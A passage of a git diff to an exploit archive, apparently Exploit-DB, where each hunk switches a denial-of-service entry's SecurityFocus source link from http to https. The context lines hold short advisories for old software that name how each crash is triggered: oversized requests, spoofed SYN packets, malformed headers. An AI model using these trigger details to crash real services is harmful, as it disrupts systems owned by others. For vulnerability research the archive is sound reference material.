b/exploits/multiple/dos/19780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1013/info +source: https://www.securityfocus.com/bid/1013/info Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, clients running OfficeScan are configured to listen to port 12345 in order to receive periodical database engine updates and other administrative commands from the OfficeScan manager. diff --git a/exploits/multiple/dos/19920.c b/exploits/multiple/dos/19920.c index 94869b704..c6ffc220c 100644 --- a/exploits/multiple/dos/19920.c +++ b/exploits/multiple/dos/19920.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1213/info +// source: https://www.securityfocus.com/bid/1213/info A buffer overflow DoS vulnerability exists in CProxy Server 3.3 Service Pack 2 diff --git a/exploits/multiple/dos/19965.txt b/exploits/multiple/dos/19965.txt index 6b83cdeba..777c6f88f 100644 --- a/exploits/multiple/dos/19965.txt +++ b/exploits/multiple/dos/19965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1246/info +source: https://www.securityfocus.com/bid/1246/info By default JetAdmin Web Interface Server listens on port 8000. If a malformed URL request is sent to port 8000 this will cause the server services to stop responding. The service must be stopped and restarted to regain normal functionality. diff --git a/exploits/multiple/dos/19977.txt b/exploits/multiple/dos/19977.txt index d35f626c2..7581128ba 100644 --- a/exploits/multiple/dos/19977.txt +++ b/exploits/multiple/dos/19977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1288/info +source: https://www.securityfocus.com/bid/1288/info RealServer 7.0 will crash if it receives a request for a specific file with an unspecified variable value. diff --git a/exploits/multiple/dos/19984.c b/exploits/multiple/dos/19984.c index ef74df75d..1a93fd742 100644 --- a/exploits/multiple/dos/19984.c +++ b/exploits/multiple/dos/19984.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1298/info +// source: https://www.securityfocus.com/bid/1298/info xterm is a popular X11-based terminal emulator. If VT control-characters are displayed in the xterm, they can be interpreted and used to cause a denial of service attack against the client (and even the host running the client). What makes it possible for remote users to exploit this vulnerability is a situation like this: diff --git a/exploits/multiple/dos/19996.txt b/exploits/multiple/dos/19996.txt index fb5fef990..28f7204ce 100644 --- a/exploits/multiple/dos/19996.txt +++ b/exploits/multiple/dos/19996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1314/info +source: https://www.securityfocus.com/bid/1314/info Due to a faulty mechanism in the password parsing implementation in authentication requests, it is possible to launch a denial of service attack against Allaire ColdFusion 4.5.1 or previous by inputting a string of over 40 000 characters to the password field in the Administrator login page. CPU utilization could reach up to 100%, bringing the program to halt. The default form for the login page would prevent such an attack. However, a malicious user could download the form locally to their hard drive, modify HTML tag fields, and be able to submit the 40 000 character string to the ColdFusion Server. diff --git a/exploits/multiple/dos/20052.txt b/exploits/multiple/dos/20052.txt index c3f25ad5b..3d886a5f5 100644 --- a/exploits/multiple/dos/20052.txt +++ b/exploits/multiple/dos/20052.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1421/info +source: https://www.securityfocus.com/bid/1421/info If an E-mail containing an excessively long To: field in the header (~1.5 MB) is processed by First Class Intranet Services (FCIS), a Denial of Service can occur. diff --git a/exploits/multiple/dos/20098.txt b/exploits/multiple/dos/20098.txt index 1b3a79553..82d0ec691 100644 --- a/exploits/multiple/dos/20098.txt +++ b/exploits/multiple/dos/20098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1503/info +source: https://www.securityfocus.com/bid/1503/info Netscape Browsers use the Independent JPEG Group's decoder library to process JPEG encoded images. The library functions skip JPEG comments; however, the browser uses a custom function to process these comments and store them in memory. The comment includes a 2-byte "length" field which indicates how long the comment is - this value includes the 2-bytes of the "length" field. To determine the length of the comment string alone (for memory allocation), the function reads the value in the "length" field and subtracts two. The function then allocates the length of the comment + one byte for NULL termination. There is no error checking to ensure the "length" value is valid. This makes it possible to cause an overflow by creating an image with a comment "length" field containing the value 1. The memory allocation call of 0 bytes (1 minus 2 (length field) + 1 (null termination)) will succeed. The calculated comment size variable is declared unsigned, resulting in a large positive value (from 1 minus 2). The comment handling function goes into a loop to read the comment into memory, but since the calculated comment size is enormous this causes the function to read the entire JPEG stream, overwriting the heap. It is theoretically possible to exploit this to execute arbitrary code. The browser, mail and news readers are all vulnerable to this. diff --git a/exploits/multiple/dos/20178.pl b/exploits/multiple/dos/20178.pl index 4be5a4bb0..535a5ede8 100755 --- a/exploits/multiple/dos/20178.pl +++ b/exploits/multiple/dos/20178.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1610/info +source: https://www.securityfocus.com/bid/1610/info vqServer 1.4.49 is subject to a buffer overflow. If a GET request is sent to the server containing 65 000 characters the server will stop responding. A reboot is required in order to gain normal functionality. diff --git a/exploits/multiple/dos/20229.txt b/exploits/multiple/dos/20229.txt index b3408cf5c..ad41ee1e0 100644 --- a/exploits/multiple/dos/20229.txt +++ b/exploits/multiple/dos/20229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1691/info +source: https://www.securityfocus.com/bid/1691/info Large amounts of data (ie 1092+ characters) in the Host: request header may cause the web server process to fault on signal 11 (SIGSEGV) or signal 10 (SIGBUS). diff --git a/exploits/multiple/dos/20239.txt b/exploits/multiple/dos/20239.txt index 98c25a1ea..864d88fe7 100644 --- a/exploits/multiple/dos/20239.txt +++ b/exploits/multiple/dos/20239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1713/info +source: https://www.securityfocus.com/bid/1713/info The OverView5 CGI interface by default is shipped with HP Openview Node Manager. diff --git a/exploits/multiple/dos/20336.txt b/exploits/multiple/dos/20336.txt index a77abf3da..a9844e048 100644 --- a/exploits/multiple/dos/20336.txt +++ b/exploits/multiple/dos/20336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1868/info +source: https://www.securityfocus.com/bid/1868/info Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. diff --git a/exploits/multiple/dos/20531.txt b/exploits/multiple/dos/20531.txt index 9d62a0d25..d0b697fb5 100644 --- a/exploits/multiple/dos/20531.txt +++ b/exploits/multiple/dos/20531.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2175/info +source: https://www.securityfocus.com/bid/2175/info IBM HTTP Server contains AfpaCache directive which turns the Fast Response Cache Accelerator function on or off. WebSphere is a series of applications which are built upon IBM HTTP Server. diff --git a/exploits/multiple/dos/20534.txt b/exploits/multiple/dos/20534.txt index 02db1b323..ae3fb19af 100644 --- a/exploits/multiple/dos/20534.txt +++ b/exploits/multiple/dos/20534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2178/info +source: https://www.securityfocus.com/bid/2178/info WebMaster ConferenceRoom Developer Edition is a chat package which enables a large community of users to chat together. ConferenceRoom has a wide range of capabilities and a user friendly channel moderation feature. diff --git a/exploits/multiple/dos/20558.txt b/exploits/multiple/dos/20558.txt index 0deb45af1..2b03038f7 100644 --- a/exploits/multiple/dos/20558.txt +++ b/exploits/multiple/dos/20558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2216/info +source: https://www.securityfocus.com/bid/2216/info Apache Web Server 1.2 and previous versions are subject to a denial of service. By requesting a malformed GET request composed of an unusually large number of '/' characters, an attacker can cause CPU usage to spike. A restart of the service is required to gain normal functionality. diff --git a/exploits/multiple/dos/20610.txt b/exploits/multiple/dos/20610.txt index de68e76ea..e63406419 100644 --- a/exploits/multiple/dos/20610.txt +++ b/exploits/multiple/dos/20610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2337/info +source: https://www.securityfocus.com/bid/2337/info A denial of service condition exists in the JRun web application server. Requesting multiple malformed URLs by way of the java servlet, will cause the JRun application server to stop responding. diff --git a/exploits/multiple/dos/20659.txt b/exploits/multiple/dos/20659.txt index 997bf39d1..3e9168848 100644 --- a/exploits/multiple/dos/20659.txt +++ b/exploits/multiple/dos/20659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2442/info +source: https://www.securityfocus.com/bid/2442/info SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms. diff --git a/exploits/multiple/dos/20792.txt b/exploits/multiple/dos/20792.txt index 034a52eb9..695b35bfc 100644 --- a/exploits/multiple/dos/20792.txt +++ b/exploits/multiple/dos/20792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2641/info +source: https://www.securityfocus.com/bid/2641/info Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT. Novell versions of the Mercury POP3 server prior to 1.48 are vulnerable to a buffer overflow caused by inadequate string handling for the APOP authentication command. diff --git a/exploits/multiple/dos/20810.c b/exploits/multiple/dos/20810.c index b64617416..476a0ff51 100644 --- a/exploits/multiple/dos/20810.c +++ b/exploits/multiple/dos/20810.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2666/info +source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. diff --git a/exploits/multiple/dos/20811.cpp b/exploits/multiple/dos/20811.cpp index a2cd80bba..0c573bbfa 100644 --- a/exploits/multiple/dos/20811.cpp +++ b/exploits/multiple/dos/20811.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2666/info +source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. diff --git a/exploits/multiple/dos/20813.c b/exploits/multiple/dos/20813.c index 4155046e4..8286e40ba 100644 --- a/exploits/multiple/dos/20813.c +++ b/exploits/multiple/dos/20813.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2666/info +source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. diff --git a/exploits/multiple/dos/20827.pl b/exploits/multiple/dos/20827.pl index ccf2b9854..8146b4d7c 100755 --- a/exploits/multiple/dos/20827.pl +++ b/exploits/multiple/dos/20827.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2700/info +source: https://www.securityfocus.com/bid/2700/info It is possible for a remote user to cause a denial of service on a host running DSL_Vdns. Submitting data to port 6070 and closing the connection before the request is fulfilled, will cause DSL_Vdns to enter a 'Default.Closed' state; therefore, refusing any new connections. diff --git a/exploits/multiple/dos/20852.pl b/exploits/multiple/dos/20852.pl index fea24ebfc..fc4b02fb0 100755 --- a/exploits/multiple/dos/20852.pl +++ b/exploits/multiple/dos/20852.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2732/info +source: https://www.securityfocus.com/bid/2732/info iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance. diff --git a/exploits/multiple/dos/20853.php b/exploits/multiple/dos/20853.php index 713369044..2d96cffb5 100644 --- a/exploits/multiple/dos/20853.php +++ b/exploits/multiple/dos/20853.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2732/info +source: https://www.securityfocus.com/bid/2732/info iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance. diff --git a/exploits/multiple/dos/20973.txt b/exploits/multiple/dos/20973.txt index 484538ef7..792d61458 100644 --- a/exploits/multiple/dos/20973.txt +++ b/exploits/multiple/dos/20973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2933/info +source: https://www.securityfocus.com/bid/2933/info Icecast is an open source audio-streaming server for both Unix and Microsoft Windows systems. diff --git a/exploits/multiple/dos/20997.c b/exploits/multiple/dos/20997.c index 25f627442..c22d13b47 100644 --- a/exploits/multiple/dos/20997.c +++ b/exploits/multiple/dos/20997.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2997/info +source: https://www.securityfocus.com/bid/2997/info A potential denial of service vulnerability exists in several TCP stack implementations. diff --git a/exploits/multiple/dos/21012.c b/exploits/multiple/dos/21012.c index 74dd73690..4e4a41255 100644 --- a/exploits/multiple/dos/21012.c +++ b/exploits/multiple/dos/21012.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3051/info +// source: https://www.securityfocus.com/bid/3051/info Quake is a very popular 3D "first-person-shooter" game from ID software. diff --git a/exploits/multiple/dos/21041.txt b/exploits/multiple/dos/21041.txt index 8639c3884..f56a89e75 100644 --- a/exploits/multiple/dos/21041.txt +++ b/exploits/multiple/dos/21041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3122/info +source: https://www.securityfocus.com/bid/3122/info An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered. diff --git a/exploits/multiple/dos/21042.txt b/exploits/multiple/dos/21042.txt index 6ca12ad6c..df4cfc1ed 100644 --- a/exploits/multiple/dos/21042.txt +++ b/exploits/multiple/dos/21042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3123/info +source: https://www.securityfocus.com/bid/3123/info Quake3 Arena Server is a software package designed to host multiple Quake 3 players over a network for interactive play. diff --git a/exploits/multiple/dos/21126.c b/exploits/multiple/dos/21126.c index 78545cbdb..76b350b5d 100644 --- a/exploits/multiple/dos/21126.c +++ b/exploits/multiple/dos/21126.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3467/info +// source: https://www.securityfocus.com/bid/3467/info 6tunnel is a freely available, open source software package designed to provide IPv6 functionality to hosts that do not comply with the standard. It works by creating IPv6 tunnels. diff --git a/exploits/multiple/dos/21181.txt b/exploits/multiple/dos/21181.txt index c74375c78..5ef0d5088 100644 --- a/exploits/multiple/dos/21181.txt +++ b/exploits/multiple/dos/21181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3684/info +source: https://www.securityfocus.com/bid/3684/info An issue which affects users of multiple web browsers on Microsoft Windows platforms has been discovered. diff --git a/exploits/multiple/dos/21213.txt b/exploits/multiple/dos/21213.txt index f127a6807..c438c6be9 100644 --- a/exploits/multiple/dos/21213.txt +++ b/exploits/multiple/dos/21213.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3849/info +source: https://www.securityfocus.com/bid/3849/info Snort is a network intrusion detection system (IDS). It is originally written for Linux and Unix systems, although it has also been ported to run under Microsoft Windows. Snort is capable of flexible and powerful content analysis of network traffic, and can detect a large number of attack attempts. diff --git a/exploits/multiple/dos/21232.c b/exploits/multiple/dos/21232.c index 4499025d5..9fae84446 100644 --- a/exploits/multiple/dos/21232.c +++ b/exploits/multiple/dos/21232.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3903/info +// source: https://www.securityfocus.com/bid/3903/info Oracle 8i is an enterprise level database solution. It is available on a wide variety of platforms, including many Unix operating systems. diff --git a/exploits/multiple/dos/21337.c b/exploits/multiple/dos/21337.c index 8345a8279..d158591c5 100644 --- a/exploits/multiple/dos/21337.c +++ b/exploits/multiple/dos/21337.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4258/info +// source: https://www.securityfocus.com/bid/4258/info Menasoft SPHEREserver .99 is an online role playing game server. It is vulnerable to a denial of service; multiple connections to the server can be made from a single machine, exhausting available connections and denying connections to legitimate users. diff --git a/exploits/multiple/dos/21379.pl b/exploits/multiple/dos/21379.pl index f58d11e21..4d3550b73 100755 --- a/exploits/multiple/dos/21379.pl +++ b/exploits/multiple/dos/21379.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4508/info +source: https://www.securityfocus.com/bid/4508/info Melange Chat System is a chat server program developed by Christian Walter. Currently support for this application is no longer available. diff --git a/exploits/multiple/dos/21413.txt b/exploits/multiple/dos/21413.txt index b4c6475e1..d2e288054 100644 --- a/exploits/multiple/dos/21413.txt +++ b/exploits/multiple/dos/21413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4577/info +source: https://www.securityfocus.com/bid/4577/info A vulnerability has been reported in some versions of National Instruments LabVIEW for Linux and Microsoft Windows. diff --git a/exploits/multiple/dos/21539.c b/exploits/multiple/dos/21539.c index 5b8b4ad1c..25d5156a1 100644 --- a/exploits/multiple/dos/21539.c +++ b/exploits/multiple/dos/21539.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5002/info +// source: https://www.securityfocus.com/bid/5002/info The Netscape Communicator and Mozilla browsers include support for email, and the ability to fetch mail through a POP3 server. Both products are available for a range of platforms, including Microsoft Windows and Linux. diff --git a/exploits/multiple/dos/21544.html b/exploits/multiple/dos/21544.html index 2f1ba083c..ae46d985f 100644 --- a/exploits/multiple/dos/21544.html +++ b/exploits/multiple/dos/21544.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5010/info +source: https://www.securityfocus.com/bid/5010/info Netscape is a freely available web browser distributed by Netscape Communications, and available for various platforms. This vulnerability is known to affect those installations on the Linux platform. diff --git a/exploits/multiple/dos/21572.txt b/exploits/multiple/dos/21572.txt index c663abd7c..c240fcf19 100644 --- a/exploits/multiple/dos/21572.txt +++ b/exploits/multiple/dos/21572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5076/info +source: https://www.securityfocus.com/bid/5076/info Half-Life is a popular game distributed and maintained by Valve Software. It includes features that allow users to game locally, or in distributed network environments. Valve Software also distributes a dedicated server product. diff --git a/exploits/multiple/dos/21575.txt b/exploits/multiple/dos/21575.txt index ef8c49f69..855d649c8 100644 --- a/exploits/multiple/dos/21575.txt +++ b/exploits/multiple/dos/21575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5084/info +source: https://www.securityfocus.com/bid/5084/info An off-by-one issue exists in mod_ssl that affects Apache when handling certain types of long entries in an .htaccess file. Though this capability within the web server is not enabled by default, it is popular as it allows non-privileged users to create web access control schemes for hosted sites, and is enabled through the "AllowOverride" configuration variable in Apache. A .htaccess file with 10000 or more bytes set into the variable DATE_LOCALE will result in a buffer overflow within the web server process handling the request. diff --git a/exploits/multiple/dos/21593.txt b/exploits/multiple/dos/21593.txt index 3f515830d..72ce91c2a 100644 --- a/exploits/multiple/dos/21593.txt +++ b/exploits/multiple/dos/21593.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5148/info +source: https://www.securityfocus.com/bid/5148/info Unreal Tournament is a game produced by Epic Games, available for Microsoft Windows and Linux. Network play is supported. A vulnerability has been reported in the server used for network play. diff --git a/exploits/multiple/dos/21782.txt b/exploits/multiple/dos/21782.txt index b1169ef77..0895e1af1 100644 --- a/exploits/multiple/dos/21782.txt +++ b/exploits/multiple/dos/21782.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5678/info +source: https://www.securityfocus.com/bid/5678/info The Oracle TNS Listener program is a remote connectivity service for Oracle Databases. diff --git a/exploits/multiple/dos/21911.txt b/exploits/multiple/dos/21911.txt index 6f67f1163..5952cb858 100644 --- a/exploits/multiple/dos/21911.txt +++ b/exploits/multiple/dos/21911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5902/info +source: https://www.securityfocus.com/bid/5902/info Oracle 9i Application Server (9iAS) allows remote administration via a web access module. This vulnerability affects Oracle 9iAS running on Microsoft Windows. diff --git a/exploits/multiple/dos/22010.txt b/exploits/multiple/dos/22010.txt index d9c33ed43..d3aa0745e 100644 --- a/exploits/multiple/dos/22010.txt +++ b/exploits/multiple/dos/22010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6156/info +source: https://www.securityfocus.com/bid/6156/info A buffer overflow vulnerability has been reported for the Hotfoon dialer. The vulnerability exists in a text input field for dialing telephone numbers. Reportedly, Hotfoon4.exe does not adequately perform boundary checks on this field. diff --git a/exploits/multiple/dos/22053.txt b/exploits/multiple/dos/22053.txt index b9697e54d..c26d238f7 100644 --- a/exploits/multiple/dos/22053.txt +++ b/exploits/multiple/dos/22053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6277/info +source: https://www.securityfocus.com/bid/6277/info A buffer overflow vulnerability has been reported for Moby NetSuite that may result in a denial of service condition. Reportedly, it is possible to cause NetSuite to crash when a malformed POST request is received. diff --git a/exploits/multiple/dos/22207.txt b/exploits/multiple/dos/22207.txt index 47c5b9d33..a2f10834c 100644 --- a/exploits/multiple/dos/22207.txt +++ b/exploits/multiple/dos/22207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6734/info +source: https://www.securityfocus.com/bid/6734/info A denial of service condition has been reported in 3ware's Disk Management (3DM) by sending a malformed HTTP request to port 1080. diff --git a/exploits/multiple/dos/22223.txt b/exploits/multiple/dos/22223.txt index 61aace301..f17d3ef1e 100644 --- a/exploits/multiple/dos/22223.txt +++ b/exploits/multiple/dos/22223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6774/info +source: https://www.securityfocus.com/bid/6774/info t has been reported that a memory corruption bug exists in games based on the Unreal Engine. Under some circumstances, when the game client connects to a server using a excessive length Unreal URL it may be possible for the malformed URL to write over sensitive areas of stack memory causing the client to crash. diff --git a/exploits/multiple/dos/22230.pl b/exploits/multiple/dos/22230.pl index e4c390a65..5ea06fb7a 100755 --- a/exploits/multiple/dos/22230.pl +++ b/exploits/multiple/dos/22230.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6792/info +source: https://www.securityfocus.com/bid/6792/info It has been reported that iPlanet Web Server and Netscape Enterprise Server are prone to a remotely exploitable buffer overflow condition. This is due to insufficient bounds checking when handling HTTP requests. diff --git a/exploits/multiple/dos/22250.sh b/exploits/multiple/dos/22250.sh index 955f98927..45b6b00a6 100755 --- a/exploits/multiple/dos/22250.sh +++ b/exploits/multiple/dos/22250.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6844/info +source: https://www.securityfocus.com/bid/6844/info A buffer overflow condition has been discovered in the Intel iParty server. diff --git a/exploits/multiple/dos/22345.txt b/exploits/multiple/dos/22345.txt index 043ea1b25..43e08ee41 100644 --- a/exploits/multiple/dos/22345.txt +++ b/exploits/multiple/dos/22345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7067/info +source: https://www.securityfocus.com/bid/7067/info A vulnerability has been discovered in Multitech RouteFinder 550 VPN firmware release 4.63 and earlier. The problem occurs due to insufficient bounds checking of data supplied in HTTP GET requests. By passing excessive data to the device it may be possible for a remote attacker to corrupt memory. diff --git a/exploits/multiple/dos/22358.cfm b/exploits/multiple/dos/22358.cfm index 656b75ed2..f8a180c0c 100644 --- a/exploits/multiple/dos/22358.cfm +++ b/exploits/multiple/dos/22358.cfm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7109/info +source: https://www.securityfocus.com/bid/7109/info Several implementations of the Java Virtual Machine have been reported to be prone to a denial of service condition. This vulnerability occurs in several methods in the java.util.zip class. diff --git a/exploits/multiple/dos/22359.xsl b/exploits/multiple/dos/22359.xsl index 3e4f4d41b..d7dbe7e50 100644 --- a/exploits/multiple/dos/22359.xsl +++ b/exploits/multiple/dos/22359.xsl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7109/info +source: https://www.securityfocus.com/bid/7109/info Several implementations of the Java Virtual Machine have been reported to be prone to a denial of service condition. This vulnerability occurs in several methods in the java.util.zip class. diff --git a/exploits/multiple/dos/22360.java b/exploits/multiple/dos/22360.java index ca6fe0696..2925a699f 100644 --- a/exploits/multiple/dos/22360.java +++ b/exploits/multiple/dos/22360.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7109/info +source: https://www.securityfocus.com/bid/7109/info Several implementations of the Java Virtual Machine have been reported to be prone to a denial of service condition. This vulnerability occurs in several methods in the java.util.zip class. diff --git a/exploits/multiple/dos/22441.txt b/exploits/multiple/dos/22441.txt index ac6fdd0a5..d3954d666 100644 --- a/exploits/multiple/dos/22441.txt +++ b/exploits/multiple/dos/22441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7227/info +source: https://www.securityfocus.com/bid/7227/info A denial-of-service vulnerability has been reported to affect several browsers. The vulnerability occurs when executing certain malformed JavaScript-enabled pages. diff --git a/exploits/multiple/dos/22502.pl b/exploits/multiple/dos/22502.pl index 1037346b6..1e2ca10a4 100755 --- a/exploits/multiple/dos/22502.pl +++ b/exploits/multiple/dos/22502.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7368/info +source: https://www.securityfocus.com/bid/7368/info It has been reported that TW-WebServer is prone to a denial of service vulnerability. Reportedly when an excessive quantity of data is sent to the TW-Webserver as part of a malicious HTTP GET request the server will fail. diff --git a/exploits/multiple/dos/22503.c b/exploits/multiple/dos/22503.c index 337890a58..7868681da 100644 --- a/exploits/multiple/dos/22503.c +++ b/exploits/multiple/dos/22503.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7368/info +// source: https://www.securityfocus.com/bid/7368/info It has been reported that TW-WebServer is prone to a denial of service vulnerability. Reportedly when an excessive quantity of data is sent to the TW-Webserver as part of a malicious HTTP GET request the server will fail. diff --git a/exploits/multiple/dos/22505.txt b/exploits/multiple/dos/22505.txt index d970bdf1a..3b2093fc4 100644 --- a/exploits/multiple/dos/22505.txt +++ b/exploits/multiple/dos/22505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7375/info +source: https://www.securityfocus.com/bid/7375/info A vulnerability has been reported for the mod_access_referer Apache module. The problem occurs when parsing invalid HTTP referer header fields. If this vulnerability were to be triggered, it may be possible to trigger a NULL pointer dereference, effectively causing Apache to segfault. diff --git a/exploits/multiple/dos/22512.txt b/exploits/multiple/dos/22512.txt index d410b31e2..5bcfcd33f 100644 --- a/exploits/multiple/dos/22512.txt +++ b/exploits/multiple/dos/22512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7388/info +source: https://www.securityfocus.com/bid/7388/info The mod_ntlm Apache module has been reported prone to a heap overflow vulnerability. diff --git a/exploits/multiple/dos/22514.txt b/exploits/multiple/dos/22514.txt index 12d1bcc8d..5f5484b80 100644 --- a/exploits/multiple/dos/22514.txt +++ b/exploits/multiple/dos/22514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7393/info +source: https://www.securityfocus.com/bid/7393/info A format string vulnerability has been reported for the mod_ntlm Apache module. The problem occurs when logging authentication strings passed in HTTP requests. By passing malicious format specifiers in a request, it may be possibile for an attacker to corrupt sensitive locations in memory. This may result in a denial of service or under certain circumstances could allow an attacker to execute arbitrary code. diff --git a/exploits/multiple/dos/22535.txt b/exploits/multiple/dos/22535.txt index 5538c0114..f5ef04776 100644 --- a/exploits/multiple/dos/22535.txt +++ b/exploits/multiple/dos/22535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7428/info +source: https://www.securityfocus.com/bid/7428/info A denial of service vulnerability has been discovered in VisNetic ActiveDefense. The problem occurs when multiple HTTP requests are subsequently made to a server, containing a specific amount of data. After processing these requests, the affected system will crash. diff --git a/exploits/multiple/dos/22536.txt b/exploits/multiple/dos/22536.txt index dfee9c53f..1d316c308 100644 --- a/exploits/multiple/dos/22536.txt +++ b/exploits/multiple/dos/22536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7430/info +source: https://www.securityfocus.com/bid/7430/info Allegedly, a vulnerability exists in Opera 7.10 that may result in a denial of service. The problem reportedly occurs when processing a 'news:' URL of excessive length. It has been reported that this issue will trigger a condition that will prevent Opera from functioning until the program has been reinstalled. diff --git a/exploits/multiple/dos/22634.txt b/exploits/multiple/dos/22634.txt index 21478a166..ae6061026 100644 --- a/exploits/multiple/dos/22634.txt +++ b/exploits/multiple/dos/22634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7664/info +source: https://www.securityfocus.com/bid/7664/info Nessus has reported that various flaws have been discovered in the 'libnasl' library used by the Nessus application. As a result, a malicious NASL script may be able to break outside of the established sandbox environment and execute arbitrary commands on the local system. diff --git a/exploits/multiple/dos/22650.py b/exploits/multiple/dos/22650.py index a867e6023..45a5eb43a 100755 --- a/exploits/multiple/dos/22650.py +++ b/exploits/multiple/dos/22650.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7695/info +source: https://www.securityfocus.com/bid/7695/info When WebWeaver receives unusually long POST or HEAD requests, a denial of service condition may result. Restarting WebWeaver will allow normal operation to resume. diff --git a/exploits/multiple/dos/22859.txt b/exploits/multiple/dos/22859.txt index 535dd291b..0672bb310 100644 --- a/exploits/multiple/dos/22859.txt +++ b/exploits/multiple/dos/22859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8096/info +source: https://www.securityfocus.com/bid/8096/info Axis Print Server web interface could expose the device to a denial of service vulnerability. diff --git a/exploits/multiple/dos/22926.txt b/exploits/multiple/dos/22926.txt index d54ca7035..94c0d895b 100644 --- a/exploits/multiple/dos/22926.txt +++ 